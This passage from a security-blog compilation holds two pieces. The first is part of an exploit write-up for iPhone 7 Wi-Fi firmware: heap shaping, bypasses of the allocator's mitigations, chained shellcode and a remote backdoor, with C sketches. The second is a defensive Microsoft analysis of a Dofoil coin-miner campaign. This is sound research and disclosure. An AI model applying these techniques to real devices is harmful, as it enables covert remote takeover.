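    uint32_t a = heap_alloc(0xA4);      /* hole too small now */
    if (a != 0x13F5C)
        return 0;
    return heap_alloc(0xA4) == a - 0xA4; /* linear descending pattern */
}
```

Here 0xA4 (164) bytes is chosen to match the BA allocation size introduced below; once all fitting holes are filled, each further allocation lands exactly 164 bytes below the previous one.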

To understand the Wi-Fi firmware’s heap layout, let’s take a snapshot of the heap’s state using our Wi-Fi debugger (repeating the process multiple times to account for any variability in the state):

As we can see, several small chunks are strewn across the heap, alongside a single large chunk. From the structure above, we can deduce that in order to create a predictable allocation pattern for our NRREP buffer, we’d simply need a shaping primitive allowing us to fill all the “holes” whose sizes match that of the NRREP buffer.

However, this is easier said than done. As we’ve mentioned before, little allocations occur during routine operations, and those that do are immediately freed thereafter. Combing through all the action frame handlers, we fail to find even a single instance of a memory leak (i.e., an allocation with infinite lifetime), or even an allocation that persists beyond the scope of the handlers themselves. Be that as it may, we do know of one mechanism, governed by action frames, which could offer a solution.

Normally, each Wi-Fi frame received by a station is individually acknowledged by transmitting a corresponding acknowledgement frame in response. However, many use-cases exist in which multiple frames are expected to be sent at the same time; requiring an acknowledgement for each individual frame in those cases would be rather inefficient. Instead, the 802.11n standard (expanding on 802.11e) introduced “Block Acknowledgements” (BA). Under the new scheme, stations may acknowledge multiple frames at once, by transmitting a single BA frame.

To utilise BAs, a corresponding session must first be constructed. This is done by transmitting an ADDBA Request (IEEE 802.11-2016, 9.6.5.2) from the originating peer to the responder, resulting in an ADDBA Response (9.6.5.3) being sent in the opposite direction, acknowledging a successful setup. Similarly, BAs can be torn down by sending a DELBA frame, indicating the BA should no longer be active. Each BA is identified by a unique Traffic Identifier (TID). While the standard specifies up to 16 supported TIDs, the firmware only supports the first 8, restricting the number of BAs possible in firmware to the same limit.

Since the lifetime of BAs is explicitly controlled by the construction of the corresponding BA sessions, they may constitute good heap shaping candidates. Indeed, going over the corresponding action frame handler in the firmware, it appears that every allocated BA results in a 164-byte allocation being made, holding the BA’s contents. The allocation persists until the corresponding DELBA is received, upon which the BA structure corresponding to the given TID is freed.

To use BAs in our network, we’ll add a new command to hostapd, allowing injection of both ADDBA and DELBA requests with crafted TIDs. Furthermore, we’ll take care to compile hostapd with support for 802.11n (CONFIG_IEEE80211N) and to enable it in our network (ieee80211n).

Putting the above together, we arrive at a pretty powerful heap shaping primitive! By sending ADDBA Requests, we can trigger the allocation of up to eight distinct 164-byte allocations. Better yet, we can selectively delete the allocations corresponding to each BA by sending a DELBA frame with the corresponding TID.
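In effect, the primitive behaves like a small allocation table keyed by TID -- sketched below with our own names (the firmware's actual structures differ):

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>

/* Each ADDBA with a fresh TID pins one 164-byte allocation; a DELBA for
 * that TID releases it. The firmware supports TIDs 0..7 only. */
#define NUM_TIDS 8
#define BA_SIZE  164

static void *ba_table[NUM_TIDS];

static int handle_addba(unsigned tid) {
    if (tid >= NUM_TIDS || ba_table[tid])
        return 0;                       /* out of range or already set up */
    ba_table[tid] = calloc(1, BA_SIZE);
    return ba_table[tid] != NULL;
}

static int handle_delba(unsigned tid) {
    if (tid >= NUM_TIDS || !ba_table[tid])
        return 0;                       /* no such session */
    free(ba_table[tid]);
    ba_table[tid] = NULL;
    return 1;
}
```

The per-TID keying is what makes the primitive selective: any individual allocation can be released without disturbing its neighbours.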

Having said that, two immediate downsides also spring to mind. First, the allocation size is fixed, so we cannot use the primitive to shape the heap for allocations smaller than 164 bytes. Second, the contents of the BA buffers are not controlled by us (they mostly contain bit-fields used for reordering frames in the BA).
Attempting Overlapping Chunks

Using our shiny new shaping primitive, we can now proceed to shape the heap in a manner allowing the creation of overlapping chunks. To do so, let’s begin by allocating all the BAs, from 0 through 7. The first few allocations will fill in whatever holes can accommodate them within the heap. Subsequently, the rest of the allocations will be carved for the main heap chunk, advancing linearly from high addresses to lower ones.

(Grey blocks indicate free chunks)

Quite conveniently, as the allocations made by the shaping primitive are much larger than the small buffer allocated during the NRREP request, the smaller holes in the heap - those large enough to hold the 28-byte allocation - are left intact. Consequently, the smaller buffer is simply carved from one of the remaining holes, allowing us to safely ignore it.

Getting back to the issue at hand - in order to create an overlapping allocation, all we’d need to do is use the vulnerability primitive to increment the size field of one of the BAs. After growing the size by whichever amount we desire, we can proceed to delete the newly expanded BA, along with its neighbouring BAs, causing an overlapping allocation.

Unfortunately, running through the above scenario results in a resounding failure -- the firmware crashes upon any attempt to free a block causing an overlapping allocation…

To get to the bottom of this odd behaviour, we’ll need to locate the source of the crash. Inspecting the AppleBCMWLANBusInterfacePCIe driver, it appears that whenever a trap is generated by the firmware, the driver simply collects the aforementioned crash data and outputs it to the device’s syslog. Therefore, to inspect the crash report, we’ll simply dump the syslog using idevicesyslog. After generating a crash, we are presented with the following output:

Inspecting the source address of the crash in the firmware’s image, we come across an unfamiliar block of code in the “free” function, which was not present in prior firmware versions. In fact, the entire function seems to have many of these blocks… To understand this new code, let’s dig a little deeper.
New Mitigations

Going over the allocator’s “free” function, we find that in addition to freeing the blocks themselves, the function now performs several additional verifications on the heap’s structure, meant to ensure that it is not corrupted in any way. If any violations are detected, the firmware calls an “abort” function, subsequently causing the firmware to crash.

After reverse-engineering all the above validations, we arrive at the following list of mitigations:
1. The chunk’s bounds are compared against a pre-populated list of “allowed” regions.
2. The chunk is compared against all other chunks in the freelist, searching for overlaps.
3. The chunk is checked against a list of “disallowed” regions.
4. The chunk is ensured to be 4-byte aligned.

If any violation is detected, the firmware triggers the “abort” function, thereby halting execution.

It appears that Broadcom has done some hardening on the allocator! This is great from a security perspective, but rather bleak news for our exploit, as it appears that any attempt to create an overlapping pair of chunks will result in a crash. Perhaps we’re out of luck…

Bypassing Mitigation #1

...Or are we?

Instead of first increasing a heap block’s size and then freeing it to create overlapping chunks, let’s opt for a different approach. We’ll arrange for the following layout: first, we’ll create two free chunks which are not immediately adjacent to one another (to prevent the allocator from coalescing them). Then, we’ll use the NRREP primitive to slowly increment the size of one block until it overlaps the other.

However, as the NRREP primitive only allows us to modify data extending up to 60 bytes after the buffer, and each BA buffer is much larger in size (164 bytes), we’ll first need to devise a plan to get our NRREP buffer closer to a free chunk, without it actually impinging on the chunk (and thereby coalescing with it).

We’ll do so by leveraging a little trick. After allocating all the BAs, we’ll proceed to slightly increment the last BA’s size using the vulnerability primitive. Once that chunk is freed, a free chunk is subsequently created in its place, spanning the new expanded size instead of the original allocation’s size. Since the new free chunk extends into neighbouring BAs, the next BA allocation will therefore overlap a previously allocated BA. This allows us to effectively “sink” an allocation into neighbouring blocks, advancing the scope of influence of our NRREP buffer to previously unreachable objects!

As the allocator’s “malloc” function zeroes every chunk upon allocation, following the plan above will lead to BA6’s size being set to zero. However, there’s no need to fret: we can simply increase it using our NRREP primitive (as we’re now within range of BA6).

Next, we’ll increase BA6’s size slightly until it nearly overlaps with BA5. Then, we can free both BAs, and proceed to use the NRREP buffer to increase BA6’s free chunk until it overlaps with BA5’s. It’s important to note that since both “holes” are much smaller than the NRREP buffer, it won’t be placed within them, leaving us to utilise them as we please.

Bypassing Mitigation #2

Having created a pair of overlapping free-chunks, our first instinct is to carve an allocation from the encompassing chunk, thereby overwriting the other chunk’s metadata. To do so, we’ll need to find an allocation primitive allowing for control over its contents.

Recall that we have already searched for (and failed to locate) allocations with a controlled lifetime. Therefore, any allocation primitive we do find would be one with a limited lifespan. But alas, freeing an allocation carved from any of the overlapping chunks will lead us once again to the “free” function’s overlapping chunk mitigation, subsequently halting the firmware (and thwarting our attempt). Let’s take a closer look at the mitigation and see whether we can find a way around it.

Going through the code, it appears to have the following high-level logic:

1. //Calculating the current chunk’s bounds
2. uint8_t* start = (uint8_t*)cur + sizeof(uint32_t);
3. uint8_t* end = start + (cur->size & 0xFFFFFFFC);
4.
5. //Checking for intersection between the current chunk and each free-chunk
6. for (freechunk_t* p = get_freelist_head(); p != NULL; p = p->next) {
7. uint8_t* p_start = (uint8_t*)p;
8. uint8_t* p_end = p_start + (p->size & 0xFFFFFFFC) + 2 * sizeof(uint32_t);
9. if (end > p_start && p_end > start)
10. CRASH();
11. }

As we can see, the snippet above lacks any checks for integer overflows! Therefore, by storing a sufficiently large size in a free chunk, the calculation of p_end will overflow, causing the stored value to become a low address. Consequently, the expression at line 9 will always evaluate to “false”, allowing us to bypass the mitigation.
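To convince ourselves, we can model the check with 32-bit arithmetic (a standalone model of the logic above, using 32-bit "addresses" so the pointer arithmetic wraps exactly as on the 32-bit firmware core):

```c
#include <assert.h>
#include <stdint.h>

/* Returns non-zero if the mitigation would flag the chunk [start, end)
 * as overlapping a freelist entry at p with the given stored size. */
static int chunks_overlap(uint32_t start, uint32_t end,
                          uint32_t p, uint32_t p_size) {
    uint32_t p_start = p;
    /* p_end wraps around on overflow -- uint32_t arithmetic is modular */
    uint32_t p_end = p_start + (p_size & 0xFFFFFFFCu) + 2 * 4;
    return end > p_start && p_end > start;
}
```

With an honest size the overlap is caught, but with an exorbitant size p_end wraps to a low address and the check passes, exactly as described above.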

Great, so all we need to do is ensure that when overwriting BA5’s free chunk, we also set its size to an exorbitantly large value. Moreover, as we’re dealing with a “best-fit” allocator, such a chunk will never be the best fitting (as smaller chunks will always exist), so there’s no need to worry about the allocator using our malformed chunk in the interim.
Creating Overlapping Chunks

To proceed, we’ll need to locate an allocation primitive allowing control over its contents, and preferably also offering a controlled size. Using such a primitive, we’ll be able to create an allocation for which BA6’s free chunk is the best fitting, subsequently overwriting BA5’s free-chunk header.

Going through the action frame handlers once again, we find a near-fit; Spectrum Measurement Requests (SPECMEAS). In short, SPECMEAS frames (9.6.2.2) are action frames belonging to the Spectrum Management category. These requests are used by access points to instruct stations to perform various measurements and report the results back to the network.

Broadcom’s Wi-Fi firmware supports two different types of measurements: a “basic” measurement, and a “Clear Channel Assessment” (CCA) measurement. Upon receiving a SPECMEAS request, the firmware allocates a buffer in order to store the report’s data. For every “CCA” measurement received, 5 bytes are added to the buffer’s size. However, for every “basic” measurement encountered, 17 bytes are added to the buffer, of which many contain attacker-controlled data!

Using this primitive, we can therefore trigger allocations of sizes that are linear combinations of 5 and 17. For every 17-byte block corresponding to a “basic” measurement, we can control several of the embedded bytes (namely, those at indices [5,15]).
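When picking an allocation size, it helps to check whether a given size is actually expressible as such a combination -- a quick sketch (our own helper, not firmware code):

```c
#include <assert.h>

/* Can the SPECMEAS primitive produce an allocation of exactly `size`
 * bytes, i.e. size == 5*cca + 17*basic with both counts >= 0? */
static int specmeas_size_reachable(unsigned size) {
    for (unsigned basic = 0; 17 * basic <= size; basic++)
        if ((size - 17 * basic) % 5 == 0)
            return 1;
    return 0;
}
```

Small sizes have gaps (e.g. 13 bytes is unreachable), but any sufficiently large size is expressible, so in practice the constraint mainly dictates which combination of "basic" and "CCA" elements to encode.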

While not a perfect allocation primitive, it’ll have to do. Since there are more than eight consecutive controlled bytes for each “basic” measurement request, we can use them to overwrite BA5’s free chunk header (the 32-bit size and pointer fields). By using a linear combination of the sizes above, we’ll guarantee that the controlled bytes are aligned with BA5’s free chunk header. Lastly, the size of the allocation must also be chosen so that BA6’s free chunk is the best fitting (therefore forcing the allocation to be carved from it, rather than from other free chunks). Putting it all together, we arrive at the following layout:


Overwrite Candidates

Now that we’re able to commandeer free chunks, we just need to find some overwrite candidates in order to hijack the control flow.

Whereas in the previous firmware versions we researched, in-use chunks contained the same fields as free chunks (namely, 32-bit size and next fields), the current chunk format is incompatible with that of free chunks. Therefore, in-use chunks normally do not constitute valid targets to impersonate free chunks.

Nonetheless, it is not entirely impossible that such objects exist. For example, any in-use allocation starting with a 32-bit zero word would be a valid free chunk. Similarly, chunks could begin with 32-bit pointers to other data types, which themselves may constitute a valid chain of free chunks. Better yet, any data structure in the firmware’s RAM (not only heap chunks) could conceivably masquerade as a free chunk, so long as it follows the above format.

To get to the bottom of this, we’ve written a short script that goes over the firmware’s contents, searching for blocks that match the aforementioned description. Each block we discover constitutes a potential overwrite target by directing our fake free chunk at it. Running the script on a RAM dump of the firmware, we are greeted with the following result:

Great, there appear to be several candidates for overwrite!
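Such a scan is straightforward to reimplement. The sketch below uses our own simplified criteria and placeholder RAM bounds, not the actual script from the bug-tracker bundle:

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>
#include <stddef.h>

/* Placeholder RAM map -- not the device's real addresses. */
#define RAM_BASE 0x160000u
#define RAM_SIZE 0x0E0000u

/* A word could pass as a free chunk's "next" pointer if it is NULL, or a
 * 4-byte-aligned pointer into RAM. */
static int plausible_next_ptr(uint32_t word) {
    if (word == 0)
        return 1;
    return (word & 3u) == 0 &&
           word >= RAM_BASE && word < RAM_BASE + RAM_SIZE;
}

/* Scan a RAM dump; returns the candidate count, recording up to `max`
 * offsets into out[]. */
static size_t scan_candidates(const uint8_t *dump, size_t len,
                              size_t *out, size_t max) {
    size_t found = 0;
    for (size_t off = 0; off + 4 <= len; off += 4) {
        uint32_t w;
        memcpy(&w, dump + off, 4);
        if (plausible_next_ptr(w)) {
            if (found < max)
                out[found] = off;
            found++;
        }
    }
    return found;
}

/* Demo on a tiny synthetic dump: only the zero word and the aligned
 * in-RAM pointer qualify. */
static int scan_demo(void) {
    uint32_t words[4] = { 0, 0x160004u, 5, 0x160001u };
    size_t offs[4];
    size_t n = scan_candidates((const uint8_t *)words, sizeof(words), offs, 4);
    return n == 2 && offs[0] == 0 && offs[1] == 4;
}
```

A real scan would also validate the chain transitively (each candidate's "next" must itself point at a plausible free chunk), which prunes the list considerably.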

In our previous exploration of the Wi-Fi firmware, we identified a certain class of objects that made good targets for hijacking control flow -- timers. These structures hold function pointers denoting periodically invoked timer functions. While many such timers exist in the current firmware as well, they are rather hard to overwrite using the above primitive. First, they do not start with a 32-bit zero field (but rather with the magic value “MITA”). Second, each timer is a link in a doubly-linked list, whose contents are constantly manipulated. To overwrite a timer, we’d need to insert a valid element into the list.

Instead, going over the list of candidates above, we come across a structure within the “persist” segment, containing a block of function pointers. Using our firmware debugger, we can indeed verify that several of the function pointers within this structure are periodically invoked. Therefore, by finding a free chunk candidate within this block, we should be able to commandeer one of the aforementioned function pointers, directing it at a location of our choice.

Unfortunately, attempting to do so results in a resounding failure.
Bypassing Mitigation #3

Each attempt to allocate data on top of the aforementioned block of function pointers using SPECMEAS frames, immediately causes the firmware to halt. Inspecting the source of the crash leads us back to one of the mitigations we mentioned earlier on; the “disallowed ranges” list.

Apparently, the entire “persist” block is contained in the list of regions within which “free” operations must not occur. Consequently, without bypassing this mitigation, we will not be able to overwrite data within the aforementioned range.

Thinking about this mitigation for a moment, we come up with an interesting proposition: perhaps we could use our commandeered free chunk in order to overwrite the “disallowed ranges” list itself?

While the list’s contents lie within one of the disallowed zones, recall that this validation is only performed by the “free” function, whereas “malloc” will happily carve allocations at any address, without consulting the above list. Therefore, by pointing our free chunk at a location overlapping the “disallowed ranges” list, we can use a SPECMEAS frame to overwrite its contents (thereby nullifying its effect). While SPECMEAS frames are freed immediately after they are allocated, this is no longer a concern, as by the time the “free” occurs, the “disallowed ranges” list will have already been overwritten!
Putting It All Together

Using the steps above, we can disable the “disallowed ranges” list, allowing us to subsequently use the commandeered free chunk in order to hijack one of the function pointers in the persist block. Finally, we simply require a means of stashing some shellcode in a predictable location within the firmware’s RAM. By doing so, we will be able to direct the aforementioned function pointer at our shellcode, leading to arbitrary code execution.

Since the addresses within the “persist” block are fixed, they make for prime candidates to store our shellcode. Searching through the block, we come across several potential overwrite candidates, any of which can be hijacked with our “fake” free chunk.

However, there’s one more hurdle to overcome -- the code we’re about to store must not be overwritten at any point. If the code is inadvertently overwritten, the firmware will attempt to execute a corrupted chunk of code, possibly leading it to crash.

To get around this limitation, we’ll use one more action frame: Radio Measurement Requests (RMREQ). These frames are part of the 802.11k RRM standard, and allow for periodic measurements to be performed (and reported) by the firmware. Similarly to SPECMEAS frames, their handler allocates several bytes of data for each measurement IE encoded in the request.

Most importantly, RMREQ frames include a field denoting the number of repetitions that stations should perform when receiving the scan request. Going through the specification reveals that this field also has a “special” value, allowing scans to continue indefinitely:


IEEE 802.11-2016, 9.6.7.3

By encoding this value in an RMREQ frame, we can guarantee that the corresponding allocated buffer will not be subsequently freed, therefore allowing safe storage of our code.

Lastly, we need to consider the problem of the shellcode’s internal structure. Unlike SPECMEAS frames, which allowed us to control multiple bytes in each chunk of the allocated buffer, RMREQ frames only provide control over four consecutive bytes out of every 20 bytes allocated. Luckily, as Thumb is a dense instruction set, we can cram two instructions into each 32-bit controlled word. Therefore, we can break up our shellcode using the following pattern: the first 16-bit word encodes an instruction of our choosing, whereas the second word contains a relative branch to the next controlled chunk. Formatting our shellcode in this manner allows us to construct arbitrarily large chunks of shellcode:
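The chaining pattern can be sketched as follows; the 20-byte stride, the placement of the controlled word at the start of each chunk, and the use of a Thumb `B` (encoding T2) branch are assumptions for illustration, not the exploit's exact layout:

```c
#include <stdint.h>
#include <stddef.h>

/* Assumed layout: each RMREQ measurement IE yields a 20-byte allocation,
 * with the 4 attacker-controlled bytes at its start. */
#define CHUNK_STRIDE 20

/* Thumb unconditional branch "B <label>" (encoding T2):
 * 1110 0 imm11, where imm11 = (target - (branch_address + 4)) >> 1 */
static uint16_t thumb_b(int32_t byte_offset) {
    return (uint16_t)(0xE000 | ((byte_offset >> 1) & 0x7FF));
}

/* Pack 16-bit payload instructions into chained 32-bit controlled words:
 * low halfword = payload instruction, high halfword = branch to the
 * next chunk's controlled word (the last chunk gets a NOP instead). */
void chain_shellcode(const uint16_t *insns, size_t n, uint32_t *chunks) {
    /* The branch sits at chunk_base + 2 and must reach chunk_base +
     * CHUNK_STRIDE, so its byte offset is CHUNK_STRIDE - (2 + 4). */
    int32_t off = CHUNK_STRIDE - 6;
    for (size_t i = 0; i < n; i++) {
        uint16_t br = (i + 1 < n) ? thumb_b(off) : 0xBF00 /* NOP */;
        chunks[i] = (uint32_t)insns[i] | ((uint32_t)br << 16);
    }
}
```

With a 20-byte stride, every chunk's branch word comes out identical (offset 14, i.e. `0xE007`), so only the payload halfwords vary between chunks.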

Building a Backdoor

Combining all the primitives above, we can finally stash and execute a chunk of shellcode on the Wi-Fi firmware!

To allow for easier exploration of the firmware, it’s worth taking a moment to convert this rudimentary form of access to a more refined toolset. Otherwise, we’d have to resort to encoding all the post-exploitation logic using segmented chunks of shellcode -- not an alluring prospect.

We’ll begin by using the shellcode above to write a small “backdoor” into the firmware, which we’ll call the “initial payload”. This payload constitutes the most minimal backdoor imaginable; it simply intercepts the NRREP handler, and reads two 32-bit words from it, storing the value of one word into the address denoted by the other. The initial payload therefore allows us to perform arbitrary 32-bit writes to the firmware’s RAM, by sending crafted NRREP frames over-the-air.
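A minimal sketch of what such a hook does; the frame layout (a little-endian value/address pair at the start of the NRREP body), the RAM base address, and the bounds check are all hypothetical, added here only to keep the simulation self-contained:

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Simulated firmware RAM; the base address is a made-up placeholder. */
#define FW_RAM_BASE 0x160000u
static uint8_t fw_ram[0x1000];

static uint32_t read_le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Hypothetical NRREP hook: interpret the first eight bytes of the frame
 * body as a (value, address) pair and perform the 32-bit write. The
 * range check exists only to keep this simulation memory-safe; the
 * real payload writes anywhere. */
void initial_payload_hook(const uint8_t *body, size_t len) {
    if (len < 8)
        return; /* malformed frame: ignore */
    uint32_t value = read_le32(body);
    uint32_t addr  = read_le32(body + 4);
    if (addr < FW_RAM_BASE || addr + 4 > FW_RAM_BASE + sizeof(fw_ram))
        return;
    memcpy(&fw_ram[addr - FW_RAM_BASE], &value, 4); /* little-endian host */
}
```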

Next, we’ll use the initial payload in order to write a more sophisticated one, which we’ll refer to as the “secondary payload”. This payload also intercepts the NRREP handler (replacing the previous hook), but allows for a far richer set of commands, namely:
Reading data from the firmware RAM
Writing to the firmware’s RAM
Executing a shellcode stub
Performing a CRC32 calculation on a block of data
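A rough sketch of such a command dispatcher; the opcode values and the calling convention are hypothetical, but the CRC-32 shown is the standard reflected-polynomial variant:

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical opcodes for the secondary payload's command channel */
enum { CMD_READ = 0, CMD_WRITE = 1, CMD_EXEC = 2, CMD_CRC32 = 3 };

/* Standard reflected CRC-32 (polynomial 0xEDB88320), bitwise variant */
uint32_t crc32_calc(const uint8_t *data, size_t len) {
    uint32_t crc = 0xFFFFFFFFu;
    for (size_t i = 0; i < len; i++) {
        crc ^= data[i];
        for (int b = 0; b < 8; b++)
            crc = (crc & 1) ? (crc >> 1) ^ 0xEDB88320u : crc >> 1;
    }
    return ~crc;
}

/* Dispatch one command against a memory region; buf carries the data
 * in (CMD_WRITE) or out (CMD_READ, CMD_CRC32). CMD_EXEC is omitted
 * from this sketch. */
int handle_command(uint8_t op, uint8_t *mem, size_t off, size_t len,
                   uint8_t *buf) {
    switch (op) {
    case CMD_READ:  memcpy(buf, mem + off, len); return 0;
    case CMD_WRITE: memcpy(mem + off, buf, len); return 0;
    case CMD_CRC32: {
        uint32_t c = crc32_calc(mem + off, len);
        memcpy(buf, &c, 4);
        return 0;
    }
    default: return -1;
    }
}
```

The CRC command is what lets the remote side cheaply verify large regions of firmware RAM without reading them back over-the-air.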

The capabilities above allow us to fully control the firmware over-the-air, from the safety of a Python script. Indeed, much like our research platform, we’ve implemented the protocols for communicating with the backdoor in Python, exposing APIs for all of the functionality above.

In fact, the two are so similar that several of the research framework’s modules can be directly executed using the secondary payload, by simply replacing the memory access APIs in the research framework with those offered by the secondary payload.
The Exploit

Summing up all the work above, we’ve finally written a complete exploit, allowing code execution on the Wi-Fi chip of the iPhone 7. You can find the complete exploit here.

The exploit has been tested against the Wi-Fi firmware present in iOS 10.2 (14C92). The vulnerability is present in versions of iOS up to (and including) iOS 10.3.3. Researchers wishing to utilise the exploit on different iDevices or different versions, would be required to adjust the necessary symbols used by the exploit (see “exploit/symbols.py”).

Note that the exploit continuously attempts to install the backdoor into the Wi-Fi firmware, until it is successful. For any unsuccessful attempt, the firmware simply silently reboots, allowing the exploit to continue along. Moreover, due to a clever feat of engineering by Apple, rebooting the firmware does not interrupt ongoing connections; instead, they are continued as the chip reboots, allowing for a rather stealthy attack.


Wrapping Up

Over the course of this blog post we performed a deep dive into the Wi-Fi firmware present on the iPhone 7. Our exploration led us to discover new attack surfaces, several added mitigations, and multiple vulnerabilities.

By exploiting one of the aforementioned vulnerabilities, we were able to gain control over the Wi-Fi SoC, allowing us to gain a foothold on the device itself, directly over-the-air. In doing so, we also bypassed several of the firmware’s exploit mitigations, demonstrating how they can be reinforced in future versions.

In the next blog post, we’ll complete our journey towards full control over the target device, by devising a full exploit chain allowing us to leverage our newly acquired control over the Wi-Fi chip in order to launch an attack against iOS itself. Ultimately, we’ll construct an over-the-air exploit allowing complete control over the iOS kernel.


Behavior monitoring combined with machine learning spoils a massive Dofoil coin mining campaign
17.3.2018 Microsoft
Computer Attack blog
in Windows, Windows Defender Advanced Threat Protection, Endpoint Security, Incident Response, Threat Protection, Research
Update: Further analysis of this campaign points to a poisoned update for a peer-to-peer (P2P) application. For more information, read Poisoned peer-to-peer app kicked off Dofoil coin miner outbreak.

Just before noon on March 6 (PST), Windows Defender Antivirus blocked more than 80,000 instances of several sophisticated trojans that exhibited advanced cross-process injection techniques, persistence mechanisms, and evasion methods. Behavior-based signals coupled with cloud-powered machine learning models uncovered this new wave of infection attempts. The trojans, which are new variants of Dofoil (also known as Smoke Loader), carry a coin miner payload. Within the next 12 hours, more than 400,000 instances were recorded, 73% of which were in Russia. Turkey accounted for 18% and Ukraine 4% of the global encounters.

Figure 1: Geographic distribution of the Dofoil attack components

Windows Defender AV initially flagged the attack’s unusual persistence mechanism through behavior monitoring, which immediately sent this behavior-based signal to our cloud protection service.

Within milliseconds, multiple metadata-based machine learning models in the cloud started blocking these threats at first sight.
Seconds later, our sample-based machine learning models also verified the malicious classification. Within minutes, detonation-based models chimed in and added additional confirmation.
Within minutes, an anomaly detection alert notified us about a new potential outbreak.
After analysis, our response team updated the classification name of this new surge of threats to the proper malware families. People affected by these infection attempts early in the campaign would have seen blocks under machine learning names like Fuery, Fuerboos, Cloxer, or Azden. Later blocks show as the proper family names, Dofoil or Coinminer.
Windows 10, Windows 8.1, and Windows 7 users running Windows Defender AV or Microsoft Security Essentials are all protected from this latest outbreak.

Figure 2. Layered machine learning defenses in Windows Defender AV

Artificial intelligence and behavior-based detection in Windows Defender AV have become mainstays of our defense system. The AI-based pre-emptive protection provided against this attack is similar to how layered machine learning defenses stopped an Emotet outbreak last month.

Code injection and coin mining
Dofoil is the latest malware family to incorporate coin miners in attacks. Because the value of Bitcoin and other cryptocurrencies continues to grow, malware operators see the opportunity to include coin mining components in their attacks. For example, exploit kits are now delivering coin miners instead of ransomware. Scammers are adding coin mining scripts in tech support scam websites. And certain banking trojan families added coin mining behavior.

The Dofoil campaign we detected on March 6 started with a trojan that performs process hollowing on explorer.exe. Process hollowing is a code injection technique that involves spawning a new instance of a legitimate process (in this case c:\windows\syswow64\explorer.exe) and then replacing the legitimate code with malware.

Figure 3. Windows Defender ATP detection for process hollowing (SHA-256: d191ee5b20ec95fe65d6708cbb01a6ce72374b309c9bfb7462206a0c7e039f4d, detected by Windows Defender AV as TrojanDownloader:Win32/Dofoil.AB)

The hollowed explorer.exe process then spins up a second malicious instance, which drops and runs a coin mining malware masquerading as a legitimate Windows binary, wuauclt.exe.

Figure 4. Windows Defender ATP detection for coin mining malware (SHA-256: 2b83c69cf32c5f8f43ec2895ec9ac730bf73e1b2f37e44a3cf8ce814fb51f120, detected by Windows Defender AV as Trojan:Win32/CoinMiner.D)

Even though it uses the name of a legitimate Windows binary, it’s running from the wrong location. The command line is anomalous compared to the legitimate binary. Additionally, the network traffic from this binary is suspicious.
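The "right name, wrong location" heuristic can be sketched as a simple path check; the expected path and the helper names below are illustrative assumptions, not Windows Defender's actual detection logic:

```c
#include <ctype.h>

/* Case-insensitive path comparison, treating '\\' and '/' as equal
 * (Windows paths are case-insensitive). */
static int path_eq_nocase(const char *a, const char *b) {
    while (*a && *b) {
        char ca = (char)tolower((unsigned char)*a++);
        char cb = (char)tolower((unsigned char)*b++);
        if (ca == '\\') ca = '/';
        if (cb == '\\') cb = '/';
        if (ca != cb)
            return 0;
    }
    return *a == *b;
}

/* Flag a process that borrows the Windows Update client's name but
 * does not run from its expected location. The single expected path
 * is a simplification: legitimate copies can live elsewhere too. */
int is_masquerading_wuauclt(const char *image_path) {
    const char *name = image_path;
    for (const char *p = image_path; *p; p++)
        if (*p == '\\' || *p == '/')
            name = p + 1;
    if (!path_eq_nocase(name, "wuauclt.exe"))
        return 0; /* not claiming to be wuauclt */
    return !path_eq_nocase(image_path, "C:\\Windows\\System32\\wuauclt.exe");
}
```

A real detector would combine this with the other signals mentioned above: anomalous command line and suspicious network traffic.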

Figure 5. Windows Defender ATP alert process tree showing anomalous IP communications

Figure 6. Windows Defender ATP showing suspicious network activity

Figure 7. Windows Defender ATP alert process tree showing hollowed explorer.exe process making suspicious connections

Dofoil uses a customized mining application. Based on its code, the coin miner supports NiceHash, which means it can mine different cryptocurrencies. The samples we analyzed mined Electroneum coins.

Persistence
For coin miner malware, persistence is key. These types of malware employ various techniques to stay undetected for long periods of time in order to mine coins using stolen computer resources.

To stay hidden, Dofoil modifies the registry. The hollowed explorer.exe process creates a copy of the original malware in the Roaming AppData folder and renames it to ditereah.exe. It then creates a registry key or modifies an existing one to point to the newly created malware copy. In the sample we analyzed, the malware modified the OneDrive Run key.
Figure 8. Windows Defender ATP alert process tree showing creation of new malware process (SHA-256: d191ee5b20ec95fe65d6708cbb01a6ce72374b309c9bfb7462206a0c7e039f4d) and registry modification

Command-and-control communication
Dofoil is an enduring family of trojan downloaders. These connect to command-and-control (C&C) servers to listen for commands to download and install malware. In the March 6 campaign, Dofoil’s C&C communication involves the use of the decentralized Namecoin network infrastructure.

The hollowed explorer.exe process writes and runs another binary, D1C6.tmp.exe (SHA256: 5f3efdc65551edb0122ab2c40738c48b677b1058f7dfcdb86b05af42a2d8299c), into the Temp folder. D1C6.tmp.exe then drops and executes a copy of itself named lyk.exe. Once running, lyk.exe connects to IP addresses that act as DNS proxy servers for the Namecoin network. It then attempts to connect to the C&C server vinik.bit inside the Namecoin infrastructure. The C&C server commands the malware to connect to or disconnect from an IP address; download a file from a certain URL and execute or terminate the specific file; or sleep for a period of time.

Figure 9. Windows Defender ATP alert process tree showing creation of the temporary file, D1C6.tmp.exe (SHA256: 5f3efdc65551edb0122ab2c40738c48b677b1058f7dfcdb86b05af42a2d8299c)

Figure 10. Windows Defender ATP alert process tree showing lyk.exe connecting to IP addresses

Stay protected with Windows 10
With the rise in valuation of cryptocurrencies, cybercriminal groups are launching more and more attacks to infiltrate networks and quietly mine for coins.

Windows Defender AV’s layered approach to security, which uses behavior-based detection algorithms, generics, and heuristics, as well as machine learning models in both the client and the cloud, provides real-time protection against new threats and outbreaks.

As demonstrated, Windows Defender Advanced Threat Protection (Windows Defender ATP) flags malicious behaviors related to installation, code injection, persistence mechanisms, and coin mining activities. Security operations can use the rich detection libraries in Windows Defender ATP to detect and respond to anomalous activities in the network. Windows Defender ATP also integrates protections from Windows Defender AV, Windows Defender Exploit Guard, and Windows Defender Application Guard, providing a seamless security management experience.

Windows 10 S, a special configuration of Windows 10, helps protect against coin miners and other threats. Windows 10 S works exclusively with apps from the Microsoft Store and uses Microsoft Edge as the default browser, providing Microsoft verified security.


Reading privileged memory with a side-channel
4.1.2018 Google Project Zero
Vulnerebility blog

